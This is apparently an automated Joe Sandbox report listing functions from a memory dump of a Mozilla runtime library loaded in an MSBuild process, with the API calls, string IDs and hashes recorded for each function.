                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                                                                                                                                                                      • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                                                                                                                                                                      • API String ID: 801438305-4149320968
                                                                                                                                                                                                                      • Opcode ID: 490e397295cfb5ee188442ccbaa533f01b8cec01110b7dfde6c4d7dd5b9f4583
                                                                                                                                                                                                                      • Instruction ID: 2060bf044fb14039d59f6e1639aa082520ada22d9e689ac7f9353223e9a1e1aa
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 490e397295cfb5ee188442ccbaa533f01b8cec01110b7dfde6c4d7dd5b9f4583
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4491CC706087848FD734CF28C58469EB7F0AFC9258F114E2DE99A8B750DB34E94ACB52
                                                                                                                                                                                                                      Function 6C8E9E30 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __aulldiv__aullrem
                                                                                                                                                                                                                      • String ID: -Infinity$NaN
                                                                                                                                                                                                                      • API String ID: 3839614884-2141177498
                                                                                                                                                                                                                      • Opcode ID: 9c9b6942ab7ed5aa88d5caaaddce4d14152b0c1a11943432e5d1cc07ee0f99e8
                                                                                                                                                                                                                      • Instruction ID: 23be9340f05e858dd56d3822b3ad4f2a1f7e56239015364faa68216234680e44
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c9b6942ab7ed5aa88d5caaaddce4d14152b0c1a11943432e5d1cc07ee0f99e8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AFC1A331E04319DBDB24CF9CC9907EEBBB6AF89B14F14492DD406ABB80D770A945CB91
                                                                                                                                                                                                                      Function 6C8EB910 Relevance: 9.1, APIs: 6, Instructions: 146nativeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C899B80: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,6C8EB92D), ref: 6C899BC8
                                                                                                                                                                                                                        • Part of subcall function 6C899B80: __Init_thread_footer.LIBCMT ref: 6C899BDB
                                                                                                                                                                                                                      • rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C8903D4,?), ref: 6C8EB955
                                                                                                                                                                                                                      • NtQueryVirtualMemory.NTDLL ref: 6C8EB9A5
                                                                                                                                                                                                                      • NtQueryVirtualMemory.NTDLL ref: 6C8EBA20
                                                                                                                                                                                                                      • RtlNtStatusToDosError.NTDLL ref: 6C8EBA7B
                                                                                                                                                                                                                      • RtlSetLastWin32Error.NTDLL(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C8EBA81
                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C8EBA86
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Error$LastMemoryQueryVirtual$InfoInit_thread_footerStatusSystemWin32rand_s
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1753913139-0
                                                                                                                                                                                                                      • Opcode ID: 9f7319e3429a25addb5acc81d6ea80b10bda0ead04be705d96dacef86afd64a5
                                                                                                                                                                                                                      • Instruction ID: b2d5f260dda9bbd706263f8f25784578626497ef2a947af96151c14f26eb7767
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f7319e3429a25addb5acc81d6ea80b10bda0ead04be705d96dacef86afd64a5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25517D71E02229DFDF24CEA8DA84AEDB7B6AF8D314F144539E901B7704DB30AD458B94
                                                                                                                                                                                                                      Function 6C8C8AC0 Relevance: 7.7, APIs: 5, Instructions: 174timeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8BFA80: GetCurrentThreadId.KERNEL32 ref: 6C8BFA8D
                                                                                                                                                                                                                        • Part of subcall function 6C8BFA80: AcquireSRWLockExclusive.KERNEL32(6C90F448), ref: 6C8BFA99
                                                                                                                                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C8E1563), ref: 6C8C8BD5
                                                                                                                                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C8E1563), ref: 6C8C8C3A
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(-00000018,?,?,?,?,?,?,?,?,?,?,?,6C8E1563), ref: 6C8C8C74
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,6C8E1563), ref: 6C8C8CBA
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8C8CCF
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExclusiveLockNow@Stamp@mozilla@@TimeV12@_free$AcquireCurrentReleaseThread
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2153970598-0
                                                                                                                                                                                                                      • Opcode ID: 7c86531d78f9bc353fac12ca05ae7e562fa1eed09de61971fb922ee51040c158
                                                                                                                                                                                                                      • Instruction ID: 7b42df55266308ef852df1815abc2169c9989f2097d3826180857e45c0c984b5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c86531d78f9bc353fac12ca05ae7e562fa1eed09de61971fb922ee51040c158
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93718D75A04B00CFD714CF29C58062AB7F1FF99314F168A6EE9899B722E770E884CB41
                                                                                                                                                                                                                      Function 6C88F280 Relevance: 7.6, APIs: 5, Instructions: 87nativelibraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtQueryVirtualMemory.NTDLL ref: 6C88F2B4
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 6C88F2F0
                                                                                                                                                                                                                      • NtQueryVirtualMemory.NTDLL ref: 6C88F308
                                                                                                                                                                                                                      • RtlNtStatusToDosError.NTDLL ref: 6C88F36B
                                                                                                                                                                                                                      • RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,?,00000000,?,0000001C,?), ref: 6C88F371
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorMemoryQueryVirtual$AddressLastProcStatusWin32
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1171715205-0
                                                                                                                                                                                                                      • Opcode ID: b8965c1c8175b2f4c593b2a6931606cda7b3dc82fdad7aa9222569e1a10795ce
                                                                                                                                                                                                                      • Instruction ID: d62ea717ac4be5c2b33a83fb77b60fcf0da8b711df5caca9a5d616ba3e58cf2c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b8965c1c8175b2f4c593b2a6931606cda7b3dc82fdad7aa9222569e1a10795ce
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D521A530A02308DBEB309A55CE44BEF76B8EB5435CF144A39E62097EC0E7749A88C761
                                                                                                                                                                                                                      Function 6C8F545C Relevance: 6.6, APIs: 5, Instructions: 305COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,000000FF,?), ref: 6C8F8A4B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2221118986-0
                                                                                                                                                                                                                      • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                                                                                      • Instruction ID: 284b206f543623060ad567e619b8f6b25b7710b830d605ac9447c3e566482e25
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92B1E772E0021A8FDB24CF68CDD07A9B7B2EF95314F1906B9C599DB781D7309986CB90
                                                                                                                                                                                                                      Function 6C8F542B Relevance: 6.5, APIs: 5, Instructions: 287COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,000000FF,?), ref: 6C8F88F0
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C8F925C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2221118986-0
                                                                                                                                                                                                                      • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                                                                                      • Instruction ID: 76af4efa89248919f40836c68400e57a2e9022ca8da87a0a3e8d5c14de83f10d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 36B1D572E0020ACFCB24CE58CD806EDB7B2EF95314F144679C959EB785D730A99ACB90
                                                                                                                                                                                                                      Function 6C8F50C7 Relevance: 6.5, APIs: 5, Instructions: 280COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C8F8E18
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C8F925C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2221118986-0
                                                                                                                                                                                                                      • Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                                                                                                                                                                      • Instruction ID: 80f9c9e2f15dd7ad1918b8c15c76799a99bc766d202c9895264da40e0e433dab
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80A11872E0020A8FCB24CE58CD8079DB7B2EF95314F1546B9C959DB745D730A98ACB90
                                                                                                                                                                                                                      Function 6C8D77A0 Relevance: 6.3, APIs: 4, Instructions: 291timeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C8D7A81
                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C8D7A93
                                                                                                                                                                                                                        • Part of subcall function 6C8A5C50: GetTickCount64.KERNEL32 ref: 6C8A5D40
                                                                                                                                                                                                                        • Part of subcall function 6C8A5C50: EnterCriticalSection.KERNEL32(6C90F688), ref: 6C8A5D67
                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C8D7AA1
                                                                                                                                                                                                                        • Part of subcall function 6C8A5C50: __aulldiv.LIBCMT ref: 6C8A5DB4
                                                                                                                                                                                                                        • Part of subcall function 6C8A5C50: LeaveCriticalSection.KERNEL32(6C90F688), ref: 6C8A5DED
                                                                                                                                                                                                                      • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6C8D7B31
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4054851604-0
                                                                                                                                                                                                                      • Opcode ID: 51b3b36923208db080715708c1ca84b8d2369655afe41d6a21d32d08962be0ac
                                                                                                                                                                                                                      • Instruction ID: 301d78a5fa2cbfe39bd0421b3539bab866aad26f2c4cd51ecab6384e495de2d1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51b3b36923208db080715708c1ca84b8d2369655afe41d6a21d32d08962be0ac
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85B19D357087908BDB24CF28C25065FB7E2ABC5318F164E2CE99567795DB70F90ACB82
                                                                                                                                                                                                                      Function 6C8EB700 Relevance: 4.5, APIs: 3, Instructions: 41nativeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtQueryVirtualMemory.NTDLL ref: 6C8EB720
                                                                                                                                                                                                                      • RtlNtStatusToDosError.NTDLL ref: 6C8EB75A
                                                                                                                                                                                                                      • RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,00000000,00000000,?,0000001C,6C8BFE3F,00000000,00000000,?,?,00000000,?,6C8BFE3F), ref: 6C8EB760
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Error$LastMemoryQueryStatusVirtualWin32
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 304294125-0
                                                                                                                                                                                                                      • Opcode ID: fbe1f160c2529e2bc410fe38eac0b31f4f4b09f8a32aceb6c27f47a04926fc09
                                                                                                                                                                                                                      • Instruction ID: e9984427832517c79aa8700bfc9c1f280a55196b192d2d61d2f9c5bdfcb23584
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fbe1f160c2529e2bc410fe38eac0b31f4f4b09f8a32aceb6c27f47a04926fc09
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5F0A470A0430CAFEF219AE68D84BEF77BC9B0A329F105639D611619C0D77496D8C664
                                                                                                                                                                                                                      Function 6C8EB8C0 Relevance: 3.1, APIs: 2, Instructions: 118nativeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C8903D4,?), ref: 6C8EB955
                                                                                                                                                                                                                      • NtQueryVirtualMemory.NTDLL ref: 6C8EB9A5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MemoryQueryVirtualrand_s
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1889792194-0
                                                                                                                                                                                                                      • Opcode ID: 5e423ad1129681dd0a914ad0fc0786e103c67d01708aa755a685cc9f1003c678
                                                                                                                                                                                                                      • Instruction ID: 193ec9b0eb2afc4fc1fe7b03c05c19e13b302773ecf6240fa1533a7d89b934cd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e423ad1129681dd0a914ad0fc0786e103c67d01708aa755a685cc9f1003c678
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B41D431F013199FDF24CFA8E980AEEB7B5EF89354F148539E905A7704DB30A9458B94
                                                                                                                                                                                                                      Function 6C8E55F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(user32,?,6C8BE1A5), ref: 6C8E5606
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(gdi32,?,6C8BE1A5), ref: 6C8E560F
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C8E5633
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C8E563D
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C8E566C
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C8E567D
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C8E5696
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C8E56B2
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C8E56CB
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C8E56E4
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C8E56FD
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C8E5716
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C8E572F
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C8E5748
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C8E5761
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C8E577A
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C8E5793
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C8E57A8
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C8E57BD
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C8E57D5
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C8E57EA
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C8E57FF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                      • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                                                                                                                                                                      • API String ID: 2238633743-1964193996
                                                                                                                                                                                                                      • Opcode ID: 82fac6180dac9d7c5d8c56174522cbc6528d58dd2a96a259b84ae219aeaefb00
                                                                                                                                                                                                                      • Instruction ID: b3514e4421bb70c7bdda3f33b7e018f023e7968a447e3995da059c78bd0052ff
